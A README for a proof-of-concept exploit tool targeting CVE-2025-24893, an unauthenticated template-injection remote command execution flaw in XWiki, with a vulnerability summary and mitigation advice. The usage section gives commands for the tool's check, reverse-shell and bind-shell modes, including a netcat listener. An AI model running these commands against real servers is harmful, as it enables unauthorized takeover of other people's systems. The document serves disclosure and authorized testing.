## https://sploitus.com/exploit?id=D5053286-ECDC-527A-B18A-4F57AAB199AA
# CVE-2025-24893 โ XWiki Remote Command Execution (Proof of Concept)
## Overview
This repository contains a **controlled Proof of Concept (PoC)** for **CVE-2025-24893**, an **unauthenticated Remote Command Execution (RCE)** vulnerability affecting **XWiki**.
The vulnerability allows an attacker to execute arbitrary operating system commands on the server due to unsafe server-side template and script evaluation.
---
## About XWiki
XWiki is an open-source enterprise wiki platform commonly used for:
* Internal documentation
* Knowledge bases
* Team collaboration portals
Because XWiki is frequently deployed on **internet-facing servers**, security vulnerabilities in its request handling and scripting logic can have high real-world impact.
---
## Vulnerability Summary
* **CVE ID:** CVE-2025-24893
* **Category:** Server-Side Template Injection leading to Remote Command Execution
* **Attack Vector:** HTTP GET request
* **Authentication Required:** None
* **Impact:** Arbitrary command execution with server privileges
### Root Cause
User-controlled input passed to the `SolrSearch` endpoint was improperly validated and evaluated by the Groovy scripting engine.
This allowed attacker-supplied input to be interpreted as executable server-side code, resulting in command execution on the host system.
---
## Affected Versions
* XWiki versions **up to and including 15.10.10**
* Patched in subsequent releases
---
## Proof of Concept Capabilities
This PoC demonstrates the following:
* **Vulnerability Detection Mode**
Safely confirms whether the target instance is vulnerable by executing a benign server-side expression.
* **Remote Command Execution**
Demonstrates arbitrary command execution on the target system.
* **Reverse Shell Execution**
Establishes an outbound shell connection from the target to the tester.
* **Bind Shell (Optional)**
Opens a listening shell on the target host (less reliable than reverse shells).
---
## Usage
### Vulnerability Check
```bash
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
```
### Reverse Shell (Recommended)
```bash
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh -lp 4444
```
### Bind Shell
```bash
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
```
---
## High-Level Attack Flow
1. A crafted request is sent to the vulnerable `SolrSearch` endpoint
2. Malicious template instructions are injected via user-controlled input
3. The input is evaluated by the Groovy engine as trusted code
4. Arbitrary operating system commands are executed on the server
---
## Mitigation Guidance
* Upgrade XWiki to a patched version immediately
* Restrict access to internal endpoints where possible
* Limit or sandbox server-side scripting functionality
* Monitor application logs for abnormal template execution behavior
---
## Disclaimer
This project is provided **strictly for educational purposes and authorized security testing**.
Any unauthorized use of this code against systems without explicit permission is prohibited.
---
## Credits
* Original vulnerability research and PoC inspiration by **Al Baradi Joy**
* Refactored and extended for educational and defensive security research
---
## Purpose of This Repository
This repository was created to demonstrate:
* Analysis of real-world vulnerabilities
* Safe and responsible proof-of-concept development
* Understanding of server-side template injection and RCE risks
* Defensive awareness and mitigation considerations
---